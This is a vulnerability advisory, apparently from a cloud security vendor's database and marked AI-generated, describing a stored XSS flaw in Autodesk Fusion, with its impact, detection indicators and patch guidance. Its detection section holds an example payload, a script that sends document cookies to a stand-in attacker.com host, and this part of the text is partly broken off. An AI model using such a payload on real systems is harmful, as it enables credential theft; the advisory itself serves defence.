
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-0534 is a Stored Cross-Site Scripting (XSS) vulnerability in the Autodesk Fusion desktop application. A maliciously crafted HTML payload stored in a part's attribute can be triggered when a user clicks on it, potentially allowing an attacker to read local files or execute arbitrary code within the application's process context. The vulnerability affects all Autodesk Fusion versions prior to 2606.1.21 and was publicly disclosed on January 22, 2026. It carries a CVSS v3.1 base score of 8.1 (High), as assigned by Autodesk (Autodesk Advisory, NVD).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically the stored variant. An attacker embeds a malicious HTML payload within a part's attribute in Autodesk Fusion; when another user opens or interacts with that part and clicks the attribute, the payload executes within the desktop application's rendering context. Because Autodesk Fusion is a desktop application (not a traditional browser), XSS in this context can have elevated consequences beyond typical web-based XSS, including local file system access and arbitrary code execution with the privileges of the running process. No public proof-of-concept code has been identified at this time (Autodesk Advisory, NVD).
Successful exploitation allows a malicious actor to read local files accessible to the Fusion application process or execute arbitrary code with the privileges of the current user running Fusion. This could lead to sensitive data exfiltration (e.g., design files, credentials, or other local documents), unauthorized system commands, or further lateral movement within the victim's environment. Availability is not directly impacted, but the high confidentiality and integrity impacts make this a significant risk for organizations using Autodesk Fusion in collaborative or multi-user environments (Autodesk Advisory, NVD).
No public proof-of-concept exploit or evidence of in-the-wild exploitation has been reported as of the time of this report. The EPSS score is approximately 0.022%, indicating a low current probability of exploitation. The vulnerability requires user interaction — specifically, a user must click on the malicious part attribute — which somewhat limits opportunistic exploitation. The CVE is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. A patch has been made available by Autodesk (Autodesk Advisory, NVD).
<script>fetch('http://attacker.com/?data='+encodeURIComponent(document.cookie))</script> or a payload designed to read local files via Fusion's rendering engine).Fusion360.exe or equivalent) to unknown or suspicious external IP addresses or domains, particularly shortly after a user interacts with a part attribute.cmd.exe, powershell.exe, bash) spawned by the Autodesk Fusion process; unexpected script interpreter activity associated with the Fusion user session.Autodesk has released a patched version of Fusion; users should update to version 2606.1.21 or later to remediate this vulnerability. Until patching is complete, organizations should exercise caution when opening Fusion parts received from untrusted or unverified sources, and avoid clicking on part attributes from unknown origins. Restricting collaborative access to Fusion projects to trusted users only can reduce exposure. Updated installers are available via the official Autodesk download links for both Windows and macOS (Autodesk Advisory).
The vulnerability was noted in CISA's weekly vulnerability bulletin for the week of January 19, 2026, indicating it received standard government tracking attention. Red Hat's security advisory database also indexed the CVE, reflecting routine cross-vendor vulnerability tracking. No significant independent researcher commentary, social media discussion, or major media coverage has been identified beyond standard vulnerability aggregator entries (CISA Bulletin, Red Hat CVE).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."